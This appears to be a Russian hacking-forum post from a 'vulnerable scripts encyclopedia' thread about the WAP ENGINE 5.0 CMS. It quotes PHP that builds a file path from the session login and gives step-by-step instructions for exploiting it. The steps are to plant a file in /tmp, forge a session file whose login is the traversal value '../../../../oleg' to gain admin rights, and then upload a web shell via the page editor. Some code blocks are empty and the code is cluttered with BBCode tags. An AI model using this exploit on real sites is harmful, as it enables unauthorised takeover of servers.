Форум АНТИЧАТ - Показать сообщение отдельно - Энциклопедия уязвимых скриптов

WAP ENGINE 5.0

_http://wap-engine.ru/

Reverse-IP:

Нужен шелл на соседнем сайте.

->templates/run.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]]))

 {

  if([/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'SCRIPT_NAME'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'modules'[/COLOR][COLOR="#007700"]))

   {

[/COLOR][COLOR="#0000BB"]$user_data_file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"../../data/users/[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]login[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"].php"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$user_f[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$user_data_file[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);

   }

    else

   {

[/COLOR][COLOR="#0000BB"]$user_data_file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"data/users/[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]login[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"].php"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$user_f[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$user_data_file[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);

    

   }

  

[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$user_f[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$email[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$user_f[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$passw[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$user_f[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]]);

...

...

...

[/COLOR][/COLOR]

->Получение админских прав.

Expl:

Заливаем в /tmp .php файл, с таким содержанием и называем его oleg

Код:

Code:

Далее создаём файл сессии в той же папки

Код:

Code:
traf|i:140459;rand|s:4:"6523";login|s:16:"../../../../oleg";pass|s:32:"fb469d7ef430b0baf0cab6c436e70375";

ЗЫ:Не забываем выставлять права.

->Заливаем шелл

В админ панели заходим в редактор страниц-> Вставляем следующий код

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/COLOR][/COLOR]